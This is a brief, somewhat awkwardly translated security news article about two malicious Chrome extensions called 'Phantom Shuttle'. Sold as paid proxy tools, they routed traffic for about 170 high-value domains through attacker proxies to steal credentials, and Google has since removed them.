- The malicious Google Chrome extension “Phantom Shuttle” secretly redirects traffic through proxy servers controlled by the attackers.
- This extension is for users in China and collects credentials from 170 high-value domains.
- Google has removed the plugin. Experts warn that browser extensions remain a serious security risk.
Security researchers recently discovered that two Google Chrome browser extensions were redirecting valuable traffic through compromised proxy servers and exposing sensitive information to malicious third parties.
Socket.org has announced that it has discovered two extensions called “Phantom Shuttle” in the Chrome Web Store. Apparently, these plugins were advertised as plugins for proxy services that allowed users to proxy traffic and test network speeds, and were primarily targeted at Chinese users, such as business workers, who needed to test connections to different regions of China.
The plugin, which was first uploaded to the store in 2017, also had a price tag attached to it. Monthly subscription prices ranged from $1.40 to $13.60.
removed from stock
However, in addition to its intended execution, Phantom Shuttle also routed users’ web traffic through proxy servers owned by the attacker, allowing users to obtain login credentials, payment card information, personal information, and more.
However, not all traffic is routed. Instead, it receives approximately 170 valuable domains, including developer platforms, cloud service consoles, social networking sites, and adult content portals, ensuring that only valuable information is obtained.
Local networks and C2 domains are excluded from the list to prevent the plugin from displaying warnings. Google has since removed both extensions from the App Store, and a search for “phantom shuttle” returned no results.
Internet browsers are some of the most important programs on modern computers, making them a prime target of cybercriminals. While most browsers in use today are relatively secure (for example, only eight zero-day vulnerabilities will be discovered in Chrome in 2025), there are vulnerabilities in their add-ons that could allow creative criminals to insert malicious code into the software.
Therefore, users should be especially careful when downloading and installing plugins and extensions into their browsers.
For computer spying
